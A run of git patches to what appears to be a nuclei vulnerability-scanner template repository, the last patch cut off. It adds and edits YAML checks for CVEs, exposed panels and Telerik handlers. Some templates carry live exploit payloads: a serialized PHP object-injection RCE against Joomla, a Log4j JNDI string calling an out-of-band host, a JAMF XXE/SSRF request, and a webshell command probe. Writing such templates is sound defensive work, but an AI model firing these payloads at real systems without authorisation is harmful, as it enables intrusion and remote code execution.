From 77e1fa8c08433bbd22892abde1789a8fe500cf09 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 8 Jan 2022 10:22:47 +0000 Subject: [PATCH 01/49] Auto Generated CVE annotations [Sat Jan 8 10:22:47 UTC 2022] :robot: --- cves/2021/CVE-2021-45232.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-45232.yaml b/cves/2021/CVE-2021-45232.yaml index 4aedc4845e..d524c6ff99 100644 --- a/cves/2021/CVE-2021-45232.yaml +++ b/cves/2021/CVE-2021-45232.yaml @@ -3,7 +3,7 @@ id: CVE-2021-45232 info: name: Apache APISIX Dashboard api unauth access author: Mr-xn - severity: high + severity: critical description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin`, all APIs and authentication middleware are developed based on framework `droplet`, but some API directly use the interface of framework `gin` thus bypassing the authentication. reference: - https://apisix.apache.org/zh/blog/2021/12/28/dashboard-cve-2021-45232/ @@ -12,6 +12,11 @@ info: - https://twitter.com/403Timeout/status/1475715079173976066 - https://github.com/wuppp/cve-2021-45232-exp tags: cve,cve2021,apache,unauth,apisix + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-45232 + cwe-id: CWE-306 requests: - method: GET From be75b507ab3f5f6cc41d4176dec96d63d3f98f38 Mon Sep 17 00:00:00 2001 From: Valerio Preti Date: Thu, 20 Jan 2022 09:39:19 +0100 Subject: [PATCH 02/49] Create check for Rusty Joomla RCE --- vulnerabilities/joomla/rusty_joomla.yaml | 46 ++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 vulnerabilities/joomla/rusty_joomla.yaml diff --git a/vulnerabilities/joomla/rusty_joomla.yaml b/vulnerabilities/joomla/rusty_joomla.yaml new file mode 100644 index 0000000000..22b3f00155 --- /dev/null +++ b/vulnerabilities/joomla/rusty_joomla.yaml @@ -0,0 +1,46 @@ +id: rusty-joomla + +info: + name: Rusty Joomla RCE - Unauthenticated PHP Object Injection in Joomla CMS + author: leovalcante, kiks7 + severity: critical + description: Unauthenticated PHP Object Injection in Joomla CMS from the release 3.0.0 to the 3.4.6 (releases from 2012 to December 2015) that leads to Remote Code Execution. + reference: + - https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/ + - https://github.com/kiks7/rusty_joomla_rce + tags: joomla,rce,unauthenticated + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: N/A + + +requests: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Fl4m3rz.l337%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1 + + redirects: true + cookie-reuse: true + extractors: + - type: regex + name: csrf + part: body + internal: true + group: 1 + regex: + - " Date: Fri, 21 Jan 2022 12:39:28 +0530 Subject: [PATCH 03/49] Update and rename rusty_joomla.yaml to rusty-joomla.yaml --- .../joomla/{rusty_joomla.yaml => rusty-joomla.yaml} | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) rename vulnerabilities/joomla/{rusty_joomla.yaml => rusty-joomla.yaml} (91%) diff --git a/vulnerabilities/joomla/rusty_joomla.yaml b/vulnerabilities/joomla/rusty-joomla.yaml similarity index 91% rename from vulnerabilities/joomla/rusty_joomla.yaml rename to vulnerabilities/joomla/rusty-joomla.yaml index 22b3f00155..71171cf43a 100644 --- a/vulnerabilities/joomla/rusty_joomla.yaml +++ b/vulnerabilities/joomla/rusty-joomla.yaml @@ -2,17 +2,13 @@ id: rusty-joomla info: name: Rusty Joomla RCE - Unauthenticated PHP Object Injection in Joomla CMS - author: leovalcante, kiks7 + author: leovalcante,kiks7 severity: critical description: Unauthenticated PHP Object Injection in Joomla CMS from the release 3.0.0 to the 3.4.6 (releases from 2012 to December 2015) that leads to Remote Code Execution. reference: - https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/ - https://github.com/kiks7/rusty_joomla_rce - tags: joomla,rce,unauthenticated - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cve-id: N/A + tags: joomla,rce,unauth,php,cms requests: From a96f336f15c35f9eaa0199840b9a23e9ab8280f6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 25 Jan 2022 08:23:33 +0000 Subject: [PATCH 04/49] Auto Generated CVE annotations [Tue Jan 25 08:23:33 UTC 2022] :robot: --- cves/2022/CVE-2022-23178.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2022/CVE-2022-23178.yaml b/cves/2022/CVE-2022-23178.yaml index 39e59ad58c..55ef1dbfa8 100644 --- a/cves/2022/CVE-2022-23178.yaml +++ b/cves/2022/CVE-2022-23178.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-23178 - https://de.crestron.com/Products/Video/HDMI-Solutions/HDMI-Switchers/HD-MD4X2-4K-E tags: cve,cve2022,crestron,disclosure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2022-23178 + cwe-id: CWE-287 requests: - method: GET From d59a6c601796cda0259b0484c73e0b4701cc78cd Mon Sep 17 00:00:00 2001 From: sandeep Date: Fri, 28 Jan 2022 16:04:06 +0530 Subject: [PATCH 05/49] Added Deadbolt Ransomware Detection --- .../ransomware/deadbolt-ransomware.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 vulnerabilities/ransomware/deadbolt-ransomware.yaml diff --git a/vulnerabilities/ransomware/deadbolt-ransomware.yaml b/vulnerabilities/ransomware/deadbolt-ransomware.yaml new file mode 100644 index 0000000000..f0baa2ef88 --- /dev/null +++ b/vulnerabilities/ransomware/deadbolt-ransomware.yaml @@ -0,0 +1,16 @@ +id: deadbolt-ransomware + +info: + name: Deadbolt Ransomware Detection + author: pdteam + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - "ALL YOUR FILES HAVE BEEN LOCKED BY DEADBOLT." \ No newline at end of file From b34e390f2fa39e4d556fbb9820f3cf346a64920e Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Fri, 28 Jan 2022 15:57:06 -0500 Subject: [PATCH 06/49] Enhancement: exposed-panels/joomla-panel.yaml by cs --- exposed-panels/joomla-panel.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/exposed-panels/joomla-panel.yaml b/exposed-panels/joomla-panel.yaml index bef3cb248d..50d4575553 100644 --- a/exposed-panels/joomla-panel.yaml +++ b/exposed-panels/joomla-panel.yaml @@ -1,7 +1,7 @@ id: joomla-panel info: - name: Joomla Panel + name: Joomla! Panel author: its0x08 severity: info tags: panel,joomla @@ -16,3 +16,5 @@ requests: - '' - '/administrator/templates/isis/images/joomla.png' condition: or + +# Enhanced by cs on 2022/01/28 From 8aa51fb6502399e19a5dd904b63b12b195c5c03a Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Mon, 31 Jan 2022 09:43:11 -0500 Subject: [PATCH 07/49] Enhancement: workflows/joomla-workflow.yaml by cs --- workflows/joomla-workflow.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/workflows/joomla-workflow.yaml b/workflows/joomla-workflow.yaml index 634da9d0f3..f9ab969abe 100644 --- a/workflows/joomla-workflow.yaml +++ b/workflows/joomla-workflow.yaml @@ -1,7 +1,7 @@ id: joomla-workflow info: - name: Joomla Security Checks + name: Joomla! Security Checks author: daffainfo description: A simple workflow that runs all Joomla related nuclei templates on a given target. @@ -10,4 +10,5 @@ workflows: matchers: - name: joomla subtemplates: - - tags: joomla \ No newline at end of file + - tags: joomla +# Enhanced by cs on 2022/01/31 From e5a77aa803e7989b0e673bf9c3f31f07813b1137 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 1 Feb 2022 01:39:46 +0530 Subject: [PATCH 08/49] Create antsword-backdoor.yaml --- vulnerabilities/other/antsword-backdoor.yaml | 39 ++++++++++++++++++++ 1 file changed, 39 insertions(+) create mode 100644 vulnerabilities/other/antsword-backdoor.yaml diff --git a/vulnerabilities/other/antsword-backdoor.yaml b/vulnerabilities/other/antsword-backdoor.yaml new file mode 100644 index 0000000000..6e3641e755 --- /dev/null +++ b/vulnerabilities/other/antsword-backdoor.yaml @@ -0,0 +1,39 @@ +id: antsword-backdoor + +info: + name: AntSword_bypass_disable_functions_shell + author: ffffffff0x + severity: critical + description: | + 蚁剑「绕过 disable_functions」插件生成的 shell + reference: https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9 + tags: backdoor + +requests: + - method: POST + path: + - "{{BaseURL}}/.antproxy.php" + headers: + Content-Type: application/x-www-form-urlencoded + body: 'ant=phpinfo();' + + matchers-condition: and + matchers: + - type: word + words: + - "PHP Extension" + - "PHP Version" + - "Zend" + - "探针" + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '>PHP Version <\/td>([0-9.]+)' From e1b8bf3da287792b79342b0b495629272c5a7e9d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 1 Feb 2022 01:52:39 +0530 Subject: [PATCH 09/49] Update antsword-backdoor.yaml --- vulnerabilities/other/antsword-backdoor.yaml | 23 +++++--------------- 1 file changed, 6 insertions(+), 17 deletions(-) diff --git a/vulnerabilities/other/antsword-backdoor.yaml b/vulnerabilities/other/antsword-backdoor.yaml index 6e3641e755..6202b0feb0 100644 --- a/vulnerabilities/other/antsword-backdoor.yaml +++ b/vulnerabilities/other/antsword-backdoor.yaml @@ -1,13 +1,12 @@ id: antsword-backdoor info: - name: AntSword_bypass_disable_functions_shell + name: Antsword backdook author: ffffffff0x severity: critical - description: | - 蚁剑「绕过 disable_functions」插件生成的 shell + description: 蚁剑「绕过 disable_functions」插件生成的 shell reference: https://github.com/AntSwordProject/AntSword-Labs/tree/master/bypass_disable_functions/9 - tags: backdoor + tags: backdoor,antsword requests: - method: POST @@ -15,25 +14,15 @@ requests: - "{{BaseURL}}/.antproxy.php" headers: Content-Type: application/x-www-form-urlencoded - body: 'ant=phpinfo();' + body: 'ant=echo md5("antproxy.php");' matchers-condition: and matchers: - type: word + part: body words: - - "PHP Extension" - - "PHP Version" - - "Zend" - - "探针" - condition: or + - "951d11e51392117311602d0c25435d7f" - type: status status: - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '>PHP Version <\/td>([0-9.]+)' From ab1291ec13c051c82a9645d9f2dd26dff85e9f5e Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 1 Feb 2022 15:25:52 +0530 Subject: [PATCH 10/49] Added JAMF Log4j JNDI RCE Template --- vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml | 38 +++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml diff --git a/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml b/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml new file mode 100644 index 0000000000..dacfc7651f --- /dev/null +++ b/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml @@ -0,0 +1,38 @@ +id: jamf-log4j-jndi-rce + +info: + name: JAMF Log4j JNDI RCE + author: pdteam + severity: critical + reference: https://github.com/random-robbie/jamf-log4j + tags: rce,jndi,log4j,jamf + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Referer: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + + username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password= + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable + + extractors: + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output From b6db35de8bc74b3d92fdad6e56da2d902cf68124 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 1 Feb 2022 15:38:37 +0530 Subject: [PATCH 11/49] Added JAMF Panel detection --- exposed-panels/jamf-panel.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 exposed-panels/jamf-panel.yaml diff --git a/exposed-panels/jamf-panel.yaml b/exposed-panels/jamf-panel.yaml new file mode 100644 index 0000000000..aeffbaed7a --- /dev/null +++ b/exposed-panels/jamf-panel.yaml @@ -0,0 +1,25 @@ +id: jamf-panel + +info: + name: JAMF MDM Panel + author: pdteam + severity: info + metadata: + shodan-query: http.favicon.hash:1262005940 + tags: jamf,panel,mdm + +requests: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: all + words: + - "Jamf Pro Login" + - "Jamf Cloud Node" + condition: or \ No newline at end of file From c68f4762b34f523c08c03465b5facd26275cb5ef Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 1 Feb 2022 16:10:51 +0530 Subject: [PATCH 12/49] Added JAMF Blind XXE --- vulnerabilities/jamf/jamf-blind-xxe.yaml | 50 ++++++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 vulnerabilities/jamf/jamf-blind-xxe.yaml diff --git a/vulnerabilities/jamf/jamf-blind-xxe.yaml b/vulnerabilities/jamf/jamf-blind-xxe.yaml new file mode 100644 index 0000000000..f7d6678361 --- /dev/null +++ b/vulnerabilities/jamf/jamf-blind-xxe.yaml @@ -0,0 +1,50 @@ +id: jamf-blind-xxe + +info: + name: JAMF Blind XXE / SSRF + author: pdteam + severity: medium + reference: https://www.synack.com/blog/a-deep-dive-into-xxe-injection/ + tags: xxe,ssrf,jamf + +requests: + - raw: + - | + POST /client HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + + + + + + &test; + + + com.jamfsoftware.jamfdistributionserver + {{unix_time()}} + + 00000000-0000-0000-0000-000000000000 + com.jamfsoftware.jamf.distributionserverinventoryrequest + + 1999 + {{unix_time()}} + + + + 34 + + + + + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "http" + + - type: word + words: + - "com.jamfsoftware.jss" \ No newline at end of file From b7c2f9c484a730fb12b3d60980e2b39618a1ff1c Mon Sep 17 00:00:00 2001 From: nielsing Date: Tue, 1 Feb 2022 16:59:43 +0000 Subject: [PATCH 13/49] Adding .axd extensions to all paths --- .../telerik/telerik-dialoghandler-detect.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/technologies/telerik/telerik-dialoghandler-detect.yaml b/technologies/telerik/telerik-dialoghandler-detect.yaml index 6342e702d6..53dacb623f 100644 --- a/technologies/telerik/telerik-dialoghandler-detect.yaml +++ b/technologies/telerik/telerik-dialoghandler-detect.yaml @@ -28,6 +28,22 @@ requests: - '{{BaseURL}}/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1' + - '{{BaseURL}}/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.axd?dp=1' + - '{{BaseURL}}/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.axd?dp=1' + - '{{BaseURL}}/DesktopModules/Admin/RadEditorProvider/DialogHandler.axd?dp=1' + - '{{BaseURL}}/DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/Modules/CMS/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/Admin/ServerSide/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/App_Master/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/common/admin/Jobs2/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/common/admin/Calendar/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.axd?dp=1' + - '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.axd/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.axd?dp=1' stop-at-first-match: true matchers-condition: and From c052b84ffc63bc7a9ac1ddd8af15f44cb0b31742 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 1 Feb 2022 13:09:32 -0500 Subject: [PATCH 14/49] Enhancement: cves/2014/CVE-2014-8682.yaml by mp --- cves/2014/CVE-2014-8682.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/cves/2014/CVE-2014-8682.yaml b/cves/2014/CVE-2014-8682.yaml index 54f4490459..25191e9b29 100644 --- a/cves/2014/CVE-2014-8682.yaml +++ b/cves/2014/CVE-2014-8682.yaml @@ -5,6 +5,7 @@ info: author: dhiyaneshDK severity: high description: Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go. + remediation: reference: - http://www.securityfocus.com/bid/71187 - http://seclists.org/fulldisclosure/2014/Nov/33 @@ -34,3 +35,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/02/01 From a5811de4f081d054bbbcc1d3cc5d8c69283d9539 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 2 Feb 2022 00:30:39 +0530 Subject: [PATCH 15/49] Update telerik-dialoghandler-detect.yaml --- .../telerik/telerik-dialoghandler-detect.yaml | 15 --------------- 1 file changed, 15 deletions(-) diff --git a/technologies/telerik/telerik-dialoghandler-detect.yaml b/technologies/telerik/telerik-dialoghandler-detect.yaml index 53dacb623f..3a05b8baa4 100644 --- a/technologies/telerik/telerik-dialoghandler-detect.yaml +++ b/technologies/telerik/telerik-dialoghandler-detect.yaml @@ -29,21 +29,6 @@ requests: - '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1' - '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1' - '{{BaseURL}}/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.axd?dp=1' - - '{{BaseURL}}/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.axd?dp=1' - - '{{BaseURL}}/DesktopModules/Admin/RadEditorProvider/DialogHandler.axd?dp=1' - - '{{BaseURL}}/DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/Modules/CMS/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/Admin/ServerSide/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/App_Master/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/common/admin/Jobs2/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/common/admin/Calendar/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.axd?dp=1' - - '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.axd/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.axd?dp=1' stop-at-first-match: true matchers-condition: and From 2cf1bb016c21e73b8c156f92d8116f868b1dfe27 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 2 Feb 2022 00:34:39 +0530 Subject: [PATCH 16/49] Update telerik-dialoghandler-detect.yaml --- technologies/telerik/telerik-dialoghandler-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/telerik/telerik-dialoghandler-detect.yaml b/technologies/telerik/telerik-dialoghandler-detect.yaml index 3a05b8baa4..a4275c7790 100644 --- a/technologies/telerik/telerik-dialoghandler-detect.yaml +++ b/technologies/telerik/telerik-dialoghandler-detect.yaml @@ -2,7 +2,7 @@ id: telerik-dialoghandler-detect info: name: Detect Telerik Web UI Dialog Handler - author: organiccrap,zhenwarx + author: organiccrap,zhenwarx,nielsing severity: info reference: - https://captmeelo.com/pentest/2018/08/03/pwning-with-telerik.html From ec94360afdf31a18a18ec23f82b3034617739bca Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 2 Feb 2022 02:00:09 +0530 Subject: [PATCH 17/49] Update rusty-joomla.yaml --- vulnerabilities/joomla/rusty-joomla.yaml | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/vulnerabilities/joomla/rusty-joomla.yaml b/vulnerabilities/joomla/rusty-joomla.yaml index 71171cf43a..662a4d5b87 100644 --- a/vulnerabilities/joomla/rusty-joomla.yaml +++ b/vulnerabilities/joomla/rusty-joomla.yaml @@ -8,8 +8,7 @@ info: reference: - https://blog.hacktivesecurity.com/index.php/2019/10/03/rusty-joomla-rce/ - https://github.com/kiks7/rusty_joomla_rce - tags: joomla,rce,unauth,php,cms - + tags: joomla,rce,unauth,php,cms,objectinjection requests: - raw: @@ -22,9 +21,10 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Fl4m3rz.l337%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1 + username=%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0%5C0&password=AAA%22%3Bs%3A11%3A%22maonnalezzo%22%3BO%3A21%3A%22JDatabaseDriverMysqli%22%3A3%3A%7Bs%3A4%3A%22%5C0%5C0%5C0a%22%3BO%3A17%3A%22JSimplepieFactory%22%3A0%3A%7B%7Ds%3A21%3A%22%5C0%5C0%5C0disconnectHandlers%22%3Ba%3A1%3A%7Bi%3A0%3Ba%3A2%3A%7Bi%3A0%3BO%3A9%3A%22SimplePie%22%3A5%3A%7Bs%3A8%3A%22sanitize%22%3BO%3A20%3A%22JDatabaseDriverMysql%22%3A0%3A%7B%7Ds%3A5%3A%22cache%22%3Bb%3A1%3Bs%3A19%3A%22cache_name_function%22%3Bs%3A7%3A%22print_r%22%3Bs%3A10%3A%22javascript%22%3Bi%3A9999%3Bs%3A8%3A%22feed_url%22%3Bs%3A40%3A%22http%3A%2F%2Frusty.jooml%2F%3Bpkwxhxqxmdkkmscotwvh%22%3B%7Di%3A1%3Bs%3A4%3A%22init%22%3B%7D%7Ds%3A13%3A%22%5C0%5C0%5C0connection%22%3Bi%3A1%3B%7Ds%3A6%3A%22return%22%3Bs%3A102%3A&option=com_users&task=user.login&{{csrf}}=1 redirects: true + max-redirects: 2 cookie-reuse: true extractors: - type: regex @@ -35,8 +35,9 @@ requests: regex: - " Date: Tue, 1 Feb 2022 15:46:07 -0500 Subject: [PATCH 18/49] Enhancement: cves/2018/CVE-2018-17254.yaml by cs --- cves/2018/CVE-2018-17254.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-17254.yaml b/cves/2018/CVE-2018-17254.yaml index 4cfc98d6bf..f5f21b8399 100644 --- a/cves/2018/CVE-2018-17254.yaml +++ b/cves/2018/CVE-2018-17254.yaml @@ -1,7 +1,7 @@ id: CVE-2018-17254 info: - name: Joomla JCK Editor SQL Injection + name: Joomla! JCK Editor SQL Injection author: Suman_Kar description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter. severity: critical @@ -27,3 +27,5 @@ requests: part: body words: - "nuclei-template" + +# Enhanced by cs on 2022/02/01 From 141392e68322b19332abd8962d491481ebd64644 Mon Sep 17 00:00:00 2001 From: MostInterestingBotInTheWorld <98333686+MostInterestingBotInTheWorld@users.noreply.github.com> Date: Tue, 1 Feb 2022 15:46:07 -0500 Subject: [PATCH 19/49] Enhancement: cves/2018/CVE-2018-17254.yaml by cs --- cves/2018/CVE-2018-17254.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2018/CVE-2018-17254.yaml b/cves/2018/CVE-2018-17254.yaml index 4cfc98d6bf..f5f21b8399 100644 --- a/cves/2018/CVE-2018-17254.yaml +++ b/cves/2018/CVE-2018-17254.yaml @@ -1,7 +1,7 @@ id: CVE-2018-17254 info: - name: Joomla JCK Editor SQL Injection + name: Joomla! JCK Editor SQL Injection author: Suman_Kar description: The JCK Editor component 6.4.4 for Joomla! allows SQL Injection via the jtreelink/dialogs/links.php parent parameter. severity: critical @@ -27,3 +27,5 @@ requests: part: body words: - "nuclei-template" + +# Enhanced by cs on 2022/02/01 From 09558de21393b27837dabd102c5179a9c33a2e8c Mon Sep 17 00:00:00 2001 From: sullo Date: Tue, 1 Feb 2022 16:52:18 -0500 Subject: [PATCH 20/49] Adding classification --- cves/2014/CVE-2014-8682.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git 